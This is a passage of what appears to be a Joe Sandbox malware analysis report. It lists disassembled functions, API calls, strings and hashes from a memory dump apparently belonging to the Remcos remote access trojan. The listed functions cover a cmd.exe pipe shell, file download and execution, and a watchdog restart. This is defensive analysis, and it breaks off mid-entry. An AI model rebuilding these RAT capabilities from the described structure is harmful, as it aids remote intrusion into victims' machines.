                  • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                  • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                  • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                  • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                  Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 108 448bb3-448bd5 call 4484ca 110 448bda-448be1 108->110 111 448be3-448c08 110->111 112 448c0a-448c24 call 448c3b LCMapStringW 110->112 116 448c2a-448c38 call 434fcb 111->116 112->116
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx$PkGNG
                  • API String ID: 2568140703-1065776982
                  • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                  • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                  • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                  • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                  Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 120 40d069-40d095 call 401fab CreateMutexA GetLastError
                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                  • GetLastError.KERNEL32 ref: 0040D083
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID: SG
                  • API String ID: 1925916568-3189917014
                  • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                  • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                  • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                  • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                  Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 123 44edc4-44edf8 GetCPInfo 124 44eeee-44eefb 123->124 125 44edfe 123->125 126 44ef01-44ef11 124->126 127 44ee00-44ee0a 125->127 128 44ef13-44ef1b 126->128 129 44ef1d-44ef24 126->129 127->127 130 44ee0c-44ee1f 127->130 131 44ef30-44ef32 128->131 132 44ef34 129->132 133 44ef26-44ef2d 129->133 134 44ee40-44ee42 130->134 137 44ef36-44ef45 131->137 132->137 133->131 135 44ee44-44ee7b call 45112c call 44ae66 134->135 136 44ee21-44ee28 134->136 148 44ee80-44eeab call 44ae66 135->148 140 44ee37-44ee39 136->140 137->126 139 44ef47-44ef57 call 434fcb 137->139 141 44ee2a-44ee2c 140->141 142 44ee3b-44ee3e 140->142 141->142 145 44ee2e-44ee36 141->145 142->134 145->140 151 44eead-44eeb7 148->151 152 44eec7-44eec9 151->152 153 44eeb9-44eec5 151->153 155 44eee0 152->155 156 44eecb-44eed0 152->156 154 44eed7-44eede 153->154 157 44eee7-44eeea 154->157 155->157 156->154 157->151 158 44eeec 157->158 158->139
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                  • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                  • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                  • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                  Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 159 448710-448732 call 4484ca 161 448737-44873e 159->161 162 448740-44874d 161->162 163 44874f TlsAlloc 161->163 164 448755-448763 call 434fcb 162->164 163->164
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: b4f4d605eb291f9a0e31a3fdb19c0b64c96dd805d6feba376a353fba0474839d
                  • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                  • Opcode Fuzzy Hash: b4f4d605eb291f9a0e31a3fdb19c0b64c96dd805d6feba376a353fba0474839d
                  • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                  Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 169 438d94-438da9 call 438c73 171 438dae-438db5 169->171 172 438db7-438dc5 call 434b9c 171->172 173 438dc6-438dc8 TlsAlloc 171->173
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00438DA9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                  • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                  • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                  • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                  Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 44f119-44f13d call 44ecec 180 44f14d-44f154 177->180 181 44f13f-44f148 call 44ed5f 177->181 183 44f157-44f15d 180->183 188 44f2fa-44f309 call 434fcb 181->188 185 44f163-44f16f 183->185 186 44f24d-44f26c call 436e90 183->186 185->183 189 44f171-44f177 185->189 194 44f26f-44f274 186->194 192 44f245-44f248 189->192 193 44f17d-44f183 189->193 197 44f2f9 192->197 193->192 196 44f189-44f195 IsValidCodePage 193->196 198 44f276-44f27b 194->198 199 44f2ab-44f2b5 194->199 196->192 200 44f19b-44f1a8 GetCPInfo 196->200 197->188 201 44f27d-44f283 198->201 202 44f2a8 198->202 199->194 205 44f2b7-44f2de call 44ecae 199->205 203 44f232-44f238 200->203 204 44f1ae-44f1cf call 436e90 200->204 206 44f29c-44f29e 201->206 202->199 203->192 207 44f23a-44f240 call 44ed5f 203->207 217 44f1d1-44f1d8 204->217 218 44f222 204->218 219 44f2df-44f2ee 205->219 210 44f285-44f28b 206->210 211 44f2a0-44f2a6 206->211 221 44f2f6-44f2f7 207->221 210->211 215 44f28d-44f298 210->215 211->198 211->202 215->206 222 44f1da-44f1df 217->222 223 44f1fb-44f1fe 217->223 220 44f225-44f22d 218->220 219->219 224 44f2f0-44f2f1 call 44edc4 219->224 220->224 221->197 222->223 227 44f1e1-44f1e7 222->227 226 44f203-44f20a 223->226 224->221 226->226 229 44f20c-44f220 call 44ecae 226->229 228 44f1ef-44f1f1 227->228 230 44f1f3-44f1f9 228->230 231 44f1e9-44f1ee 228->231 229->220 230->222 230->223 231->228
                  APIs
                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                  • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                  • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                  • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                  • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                  Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 234 44ef58-44ef82 call 448215 call 44f077 call 44ecec 241 44ef84-44ef86 234->241 242 44ef88-44ef9d call 446137 234->242 243 44efdb-44efde 241->243 246 44efcd 242->246 247 44ef9f-44efb5 call 44f119 242->247 249 44efcf-44efda call 446782 246->249 250 44efba-44efc0 247->250 249->243 252 44efc2-44efc7 call 4405dd 250->252 253 44efdf-44efe3 250->253 252->246 256 44efe5 call 444636 253->256 257 44efea-44eff5 253->257 256->257 259 44eff7-44f001 257->259 260 44f00c-44f026 257->260 259->260 262 44f003-44f00b call 446782 259->262 260->249 263 44f028-44f02f 260->263 262->260 263->249 265 44f031-44f048 call 44ebc2 263->265 265->249 269 44f04a-44f054 265->269 269->249
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                    • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                    • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                  • _free.LIBCMT ref: 0044EFD0
                  • _free.LIBCMT ref: 0044F006
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: baf0a310567cc30cb88d0d4a2d208f706047bc877cc458132e60af230d18bea0
                  • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                  • Opcode Fuzzy Hash: baf0a310567cc30cb88d0d4a2d208f706047bc877cc458132e60af230d18bea0
                  • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                  Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 270 4484ca-4484f4 271 4484f6-4484f8 270->271 272 44855f 270->272 273 4484fe-448504 271->273 274 4484fa-4484fc 271->274 275 448561-448565 272->275 276 448506-448508 call 448566 273->276 277 448520 273->277 274->275 280 44850d-448510 276->280 279 448522-448524 277->279 281 448526-448534 GetProcAddress 279->281 282 44854f-44855d 279->282 283 448541-448547 280->283 284 448512-448518 280->284 285 448536-44853f call 43436e 281->285 286 448549 281->286 282->272 283->279 284->276 287 44851a 284->287 285->274 286->282 287->277
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                  • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                  • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                  • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                  Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 290 40165e-401664 291 401666-401668 290->291 292 401669-401674 290->292 293 401676 292->293 294 40167b-401685 292->294 293->294 295 401687-40168d 294->295 296 4016a8-4016a9 call 4344ea 294->296 295->296 298 40168f-401694 295->298 299 4016ae-4016af 296->299 298->293 300 401696-4016a6 call 4344ea 298->300 301 4016b1-4016b3 299->301 300->301
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                  • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                  • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                  • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                  Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 304 43a3ec-43a3f1 call 438d94 306 43a3f6-43a3ff 304->306 307 43a401-43a403 306->307 308 43a404-43a413 call 438e42 306->308 311 43a415-43a41a call 43a41f 308->311 312 43a41c-43a41e 308->312 311->307
                  APIs
                    • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                  • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                  • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                  • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                  Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                  • _free.LIBCMT ref: 00450140
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap_free
                  • String ID:
                  • API String ID: 614378929-0
                  • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                  • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                  • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                  • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                  Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                  • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                  • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                  • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                  Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                  • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                  • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                  • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

                  Non-executed Functions

                  Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                  Download Yara Rule
                  APIs
                  • SetEvent.KERNEL32(?,?), ref: 00407CB9
                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                  • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                    • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                    • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                    • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                  • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                  • DeleteFileA.KERNEL32(?), ref: 00408652
                    • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                    • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                    • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                    • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                  • Sleep.KERNEL32(000007D0), ref: 004086F8
                  • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                    • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                  • API String ID: 1067849700-181434739
                  • Opcode ID: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                  • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                  • Opcode Fuzzy Hash: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                  • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 004056E6
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • __Init_thread_footer.LIBCMT ref: 00405723
                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                  • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                  • CloseHandle.KERNEL32 ref: 00405A23
                  • CloseHandle.KERNEL32 ref: 00405A2B
                  • CloseHandle.KERNEL32 ref: 00405A3D
                  • CloseHandle.KERNEL32 ref: 00405A45
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                  • API String ID: 2994406822-18413064
                  • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                  • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                  • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                  • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                  Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 00412106
                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                  • OpenMutexA.KERNEL32 ref: 00412146
                  • CloseHandle.KERNEL32(00000000), ref: 00412155
                  • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                  • API String ID: 3018269243-13974260
                  • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                  • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
